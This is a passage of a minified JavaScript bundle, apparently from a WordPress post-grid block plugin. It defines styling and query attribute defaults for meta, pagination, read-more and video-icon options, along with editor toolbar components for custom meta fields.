o={metaShow:{type:"boolean",default:!0},metaPosition:{type:"string",default:"top"},metaStyle:{type:"string",default:"icon"},authorLink:{type:"boolean",default:!0},metaSeparator:{type:"string",default:"dot"},metaList:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},metaMinText:{type:"string",default:"min read"},metaAuthorPrefix:{type:"string",default:"By"},metaDateFormat:{type:"string",default:"M j, Y"},metaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",decoration:"none",family:""},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element, \n            {{ULTP}} .ultp-block-item span.ultp-block-meta-element a"}]},metaColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element svg { color: {{metaColor}}; } \n                {{ULTP}} span.ultp-block-meta-element,\n                {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element a { color: {{metaColor}}; }"}]},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element:hover, \n            {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}; } \n            {{ULTP}} span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},metaSeparatorColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta-dot span:after { background:{{metaSeparatorColor}}; } \n        {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:after { color:{{metaSeparatorColor}}; }"}]},metaSpacing:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element { margin-right:{{metaSpacing}}; } \n            {{ULTP}} span.ultp-block-meta-element { padding-left: {{metaSpacing}}; } \n            .rtl {{ULTP}} span.ultp-block-meta-element {margin-right:0; margin-left:{{metaSpacing}}; } \n            .rtl {{ULTP}} span.ultp-block-meta-element { padding-left:0; padding-right: {{metaSpacing}}; }"},{depends:[{key:"metaShow",condition:"==",value:!0},{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:last-child { margin-right:0px; }"}]},metaMargin:{type:"object",default:{lg:{top:"5",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { margin:{{metaMargin}}; }"}]},metaPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"",right:"",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { padding:{{metaPadding}}; }"}]},metaBorder:{type:"object",default:{openBorder:0,width:{top:1,right:"0",bottom:"0",left:"0"},color:"#009fd4",type:"solid"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta"}]},metaBg:{type:"string",default:"",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { background:{{metaBg}}; }"}]}}},10733:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationNav:{type:"string",default:"textArrow",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},navPosition:{type:"string",default:"topRight",style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}]}]},pagiAlign:{type:"object",default:{lg:"center"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-loadmore, \n            {{ULTP}} .ultp-next-prev-wrap ul, \n            {{ULTP}} .ultp-pagination, \n            {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},pagiTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a, \n            {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiArrowSize:{type:"object",default:{lg:"14"},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a svg { width:{{pagiArrowSize}}px; }"}]},pagiColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a,\n                {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action { color:{{pagiColor}}; }\n                {{ULTP}} .ultp-pagination svg,\n                {{ULTP}} .ultp-next-prev-wrap ul li a svg,\n                {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action svg { color:{{pagiColor}}; }"}]},pagiBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a,\n            {{ULTP}} .ultp-next-prev-wrap ul li a,\n            {{ULTP}} .ultp-loadmore-action"}]},pagiShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a,\n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action"}]},pagiRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action { border-radius:{{pagiRadius}}; }"}]},pagiHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n            {{ULTP}} .ultp-block-wrapper .ultp-loadmore-action:hover { color:{{pagiHoverColor}}; } \n            {{ULTP}} .ultp-pagination li a:hover svg,\n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover svg, \n            {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action:hover svg { color:{{pagiHoverColor}}; } \n            @media (min-width: 768px) { \n                {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover { color:{{pagiHoverColor}};}\n            }"}]},pagiHoverbg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)",replace:1},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:focus, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover{ {{pagiHoverbg}} }"}]},pagiHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li.pagination-active a,\n            {{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover { border-radius:{{pagiHoverRadius}}; }"}]},pagiPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action { padding:{{pagiPadding}}; }"}]},navMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{navMargin}}; }"}]},pagiMargin:{type:"object",default:{lg:{top:"35",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"!=",value:"navigation"}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination, \n            {{ULTP}} .ultp-loadmore { margin:{{pagiMargin}}; }"}]}}},13946:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={queryQuick:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryPostType:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"==",value:"customPostType"}]}]},queryNumPosts:{type:"object",default:{lg:6}},queryNumber:{type:"string",default:4,style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryType:{type:"string",default:"post"},queryTax:{type:"string",default:"category",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryTaxValue:{type:"string",default:"[]",style:[{depends:[{key:"queryTax",condition:"!=",value:""},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryRelation:{type:"string",default:"OR",style:[{depends:[{key:"queryTaxValue",condition:"!=",value:"[]"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOrderBy:{type:"string",default:"date"},metaKey:{type:"string",default:"custom_meta_key",style:[{depends:[{key:"queryOrderBy",condition:"==",value:"meta_value_num"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOrder:{type:"string",default:"desc"},queryInclude:{type:"string",default:""},queryExclude:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOffset:{type:"string",default:"0",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryExcludeTerm:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryExcludeAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},querySticky:{type:"boolean",default:!0,style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryUnique:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts"]}]}]},queryPosts:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"==",value:"posts"}]}]},queryCustomPosts:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"==",value:"customPosts"}]}]}}},50060:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={readMore:{type:"boolean",default:!1},readMoreText:{type:"string",default:""},readMoreIcon:{type:"string",default:"rightArrowLg"},readMoreTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:1,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-readmore a"}]},readMoreIconSize:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore svg { width:{{readMoreIconSize}}; }"}]},readMoreColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-readmore a { color:{{readMoreColor}}; } \n            {{ULTP}} .ultp-block-readmore a svg { fill:{{readMoreColor}}; }"}]},readMoreBgColor:{type:"object",default:{openColor:0,type:"color",color:"#000"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a"}]},readMoreBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a"}]},readMoreRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a { border-radius:{{readMoreRadius}}; }"}]},readMoreHoverColor:{type:"string",default:"rgba(255,255,255,0.80)",style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-readmore a:hover { color:{{readMoreHoverColor}}; } \n            {{ULTP}} .ultp-block-readmore a:hover svg { fill:{{readMoreHoverColor}} !important; }"}]},readMoreBgHoverColor:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover"}]},readMoreHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover"}]},readMoreHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover { border-radius:{{readMoreHoverRadius}}; }"}]},readMoreSacing:{type:"object",default:{lg:{top:15,bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore { margin:{{readMoreSacing}}; }"}]},readMorePadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a { padding:{{readMorePadding}}; }"}]}}},22886:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={vidIconEnable:{type:"boolean",default:!0},popupAutoPlay:{type:"boolean",default:!1},vidIconPosition:{type:"string",default:"topRight",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-video-icon { bottom: 20px; right: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-video-icon {  margin: 0 auto; position: absolute; top: 50%; left: 50%; transform: translate(-50%,-60%); -o-transform: translate(-50%,-60%); -ms-transform: translate(-50%,-60%); -moz-transform: translate(-50%,-60%); -webkit-transform: translate(-50%,-50%); z-index: 998;}"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-video-icon { bottom: 20px; left: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-video-icon { top: 20px; right: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-video-icon { top: 20px; left: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"rightMiddle"}],selector:"{{ULTP}} .ultp-video-icon {display: flex; justify-content: flex-end; align-items: center; height: 100%; width: 100%; top:0px;}"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"leftMiddle"}],selector:"{{ULTP}} .ultp-video-icon {display: flex; justify-content: flex-start; align-items: center; height: 100%; width: 100%; top: 0px;}"}]},popupIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg { color: {{popupIconColor}}; } \n            {{ULTP}} .ultp-video-icon svg circle { color: {{popupIconColor}}; }"}]},popupHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg:hover { color: {{popupHovColor}}; } \n            {{ULTP}} .ultp-video-icon svg:hover circle { color: {{popupHovColor}};}"}]},iconSize:{type:"object",default:{lg:"40",sm:"30",xs:"30",unit:"px"},style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg { height:{{iconSize}}; width: {{iconSize}};}"}]},enablePopup:{type:"boolean",default:!1,style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}]}]},popupWidth:{type:"object",default:{lg:"70"},style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-modal__Wrapper {width:{{popupWidth}}% !important;}"}]},enablePopupTitle:{type:"boolean",default:!0,style:[{depends:[{key:"enablePopup",condition:"==",value:!0}]}]},popupTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopupTitle",condition:"==",value:!0},{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-modal__Wrapper a { color:{{popupTitleColor}} !important; }"}]},closeIconSep:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}]}]},closeIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close { color:{{closeIconColor}}; }"}]},closeHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close:hover { color:{{closeHovColor}}; }"}]},closeSize:{type:"object",default:{lg:"70",unit:"px"},style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close { font-size:{{closeSize}}; }"}]}}},73151:(e,t,l)=>{"use strict";l.d(t,{O:()=>o,h:()=>a});const o={type:"object",default:{runComp:!0}};function a(e){const{attributes:{V4_1_0_CompCheck:{runComp:t}}}=e;t&&function(e){const{attributes:{blockId:t,V4_1_0_CompCheck:{runComp:l},headingShow:o,paginationShow:a,filterShow:i},setAttributes:n,name:r,clientId:s}=e;function p(){l&&n({V4_1_0_CompCheck:{runComp:!1}})}"ultimate-post/ultp-taxonomy"===r&&o?t?p():(n({headingShow:!1}),function(e){const{getBlockIndex:t,getBlockOrder:l,getBlockRootClientId:o,getBlockName:a}=wp.data.select("core/block-editor"),{insertBlock:i}=wp.data.dispatch("core/block-editor"),{createBlock:n}=wp.blocks,r=t(e),s=o(e);r>0&&"ultimate-post/heading"===a(l(s)[r-1])||i(n("ultimate-post/heading",{}),r,s,!1)}(s)):t?(["ultimate-post/post-slider-1","ultimate-post/post-slider-2"].includes(r)&&t&&o||t&&(o||a||i))&&p():n({readMore:!1,headingShow:!1,paginationShow:!1,filterShow:!1})}(e)}},2963:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(74971);function i({dcFields:e,setAttributes:t,startOnboarding:l,overlayMode:i=!1,inverseColor:n=!1}){const r=e.every((e=>e));return(0,o.createElement)("button",{type:"button",className:`ultp-add-dc-button ${r?"ultp-add-dc-button-disabled":""} ${i?"ultp-add-dc-button-top":""} ${n?"ultp-add-dc-button-inverse":""}`,onClick:o=>{if(r)return;o.stopPropagation();const i=[...e],n=i.findIndex((e=>!e));n>=0&&(i.splice(n,1),i.unshift({id:(new Date).getTime(),fields:[(0,a.rB)()]}),t({dcFields:i}),l())}},(0,o.createElement)("span",{style:{display:"flex",alignItems:"center",justifyContent:"center"}},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"19px",height:"19px",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"currentColor",d:"M19 12.998h-6v6h-2v-6H5v-2h6v-6h2v6h6z"}))),(0,o.createElement)("span",null,"Add Custom Field"))}l(43958)},82473:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(69735),i=l(53049),n=l(13448),r=l(32258),s=l(74971),p=l(46558);const{__}=wp.i18n,{ToolbarButton:c}=wp.components,u=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",style:{fill:"transparent"}},(0,o.createElement)("path",{d:"M4 18V6a2 2 0 0 1 2-2h8.864a2 2 0 0 1 1.414.586l3.136 3.136A2 2 0 0 1 20 9.136V18a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2Z",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"9.5",cy:"9.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"9.5",cy:"14.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"14.5",cy:"9.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"14.5",cy:"14.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}));function d({store:e,selected:t,layoutContext:l}){const{selectedDC:d,setSelectedDc:m,selectParentMetaGroup:g,attributes:{dcFields:y,dcGroupStyles:b}}=e,{moveMetaGroupUp:v,moveMetaGroupDown:h,removeMetaGroup:f,addMeta:k,removeMeta:w,moveMetaUp:x,moveMetaDown:T}=(0,a.Ic)({...e,layoutContext:l});if("dc_group"===t)return(0,o.createElement)(r.Z,{text:"Meta Group"},(0,o.createElement)(p.Z,{moveUp:v,moveDown:h,idx:+d}),(0,o.createElement)(n.Z,{buttonContent:i.YG,include:(0,i.tv)([{name:"tab",title:__("Meta Group Style","ultimate-post"),options:[{type:"dynamicContent",key:"dcGroupStyles",fields:[{type:"alignment",label:__("Alignment","ultimate-post"),responsive:!0,key:"dcGAlign",options:["flex-start","center","flex-end","space-between"],icons:["left_new","center_new","right_new","justbetween_new"],dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"toggle",label:__("Inline","ultimate-post"),key:"dcGInline",dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Top","ultimate-post"),key:"dcGSpacingTop",min:0,max:200,step:1,_inline:!0,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Bottom","ultimate-post"),key:"dcGSpacingBottom",min:0,max:200,step:1,_inline:!0,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Between","ultimate-post"),key:"dcGSpacing",min:0,max:200,step:1,_inline:!0,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d}]}]}]),store:e,label:__("Meta Group Style","ultimate-post")}),(0,o.createElement)(c,{label:__("Add New Meta Field","ultimate-post"),onClick:()=>k(+d),icon:(0,o.createElement)("span",{className:"dashicons dashicons-plus"})}),(0,o.createElement)(c,{label:__("Delete Meta Group","ultimate-post"),onClick:()=>f(+d),icon:(0,o.createElement)("span",{className:"dashicons dashicons-trash"})}));if("dc_field"===t){if("string"!=typeof d)return console.log("whoa",d),null;const[t,l,a]=d.split(",").map(Number),m=y[t]?.fields?.length>1,b=wp.data.select("core/block-editor").getBlock(e.clientId);return(0,o.createElement)(r.Z,{text:"Meta Field"},(0,o.createElement)("div",{className:"ultp-dynamic-content-sel-parent-btn"},(0,o.createElement)(c,{label:__("Select Parent Meta Group","ultimate-post"),onClick:()=>g(t),icon:u})),m&&(0,o.createElement)(p.Z,{moveUp:T,moveDown:x,idx:t,subIdx:l,mode:"horizontal"}),(0,o.createElement)(s.ZP,{isActive:!1,headingBlock:b,type:"toolbar",config:{groupIdx:t,fieldIdx:l,isOnboarding:1===a,icon:!0}}),(0,o.createElement)(n.Z,{buttonContent:i.YG,include:(0,i.tv)([{name:"tab",title:__("Meta Field Style","ultimate-post"),options:[{type:"dynamicContent",key:"dcFieldStyles",fields:[{type:"separator",label:__("Meta Field","ultimate-post")},{type:"typography",label:__("Typography","ultimate-post"),key:"dcFTypo",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Color","ultimate-post"),key:"dcFColor",key2:"dcFColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("Before Text","ultimate-post")},{type:"typography",label:__("Before Typography","ultimate-post"),key:"dcFBeforeTypo",key2:"dcFBeforeColor",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Before Color","ultimate-post"),key:"dcFBeforeColor",key2:"dcFBeforeColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"range",label:__("Before Spacing","ultimate-post"),key:"dcBeforeSpacing",min:0,max:100,step:1,responsive:!1,unit:!1,_inline:!0,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("After Text","ultimate-post")},{type:"typography",label:__("Afte Typography","ultimate-post"),key:"dcFAfterTypo",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("After Color","ultimate-post"),key:"dcFAfterColor",key2:"dcFAfterColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"range",label:__("After Spacing","ultimate-post"),key:"dcAfterSpacing",min:0,max:100,step:1,responsive:!1,unit:!1,_inline:!0,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("Icon","ultimate-post")},{type:"range",label:__("Icon Size","ultimate-post"),key:"dcFIconSize",min:0,max:100,step:1,responsive:!1,unit:!1,_inline:!0,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Icon Color","ultimate-post"),key:"dcFIconColor",key2:"dcFIconColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}}]}]}]),store:e,label:__("Meta Group Style","ultimate-post")}),(0,o.createElement)(c,{label:__("Delete Meta Field","ultimate-post"),onClick:()=>w(t,l),icon:(0,o.createElement)("span",{className:"dashicons dashicons-trash"})}))}return null}},12641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(30319),n=l(2376),r=l(22465);const{__}=wp.i18n,{useEffect:s,useState:p,useRef:c}=wp.element,{useSelect:u}=wp.data;function d({field:e,postId:t,settingsOnClick:l,resetOnboarding:p,groupIdx:c,idx:d}){const{text:m,hasResolved:g}=u((l=>{let a="",n="",s=[];const p="post_type"===e.dataSrc?e.postId:String(t);e.contentSrc.startsWith(r.AF)&&(a=l(i.$6).getPostInfo(p,e.contentSrc.slice(r.AF.length)),n="getPostInfo",s=[p,e.contentSrc.slice(r.AF.length)]),e.contentSrc.startsWith(r.El)&&(a=l(i.$6).getAuthorInfo(p,e.contentSrc.slice(r.El.length)),n="getAuthorInfo",s=[p,e.contentSrc.slice(r.El.length)]),(e.contentSrc.startsWith(r.BQ)||e.contentSrc.startsWith(r._P)||e.contentSrc.startsWith(r.uy)||e.contentSrc.startsWith(r.Ix))&&(a=l(i.$6).getCFValue(p,e.contentSrc),n="getCFValue",s=[p,e.contentSrc]),e.dataSrc.startsWith(r.Bj)&&(a=l(i.$6).getSiteInfo(e.dataSrc.slice(r.Bj.length)),n="getSiteInfo",s=[e.dataSrc.slice(r.Bj.length)]),["string","number","boolean","bigint"].includes(typeof a)?(a=String(a),e.maxCharLen&&(a=a.split(" ").slice(0,+e.maxCharLen).join(" "))):(console.log("Invalid Data Type: ",a),a=null),a||(a=e.fallback||"[EMPTY]");const 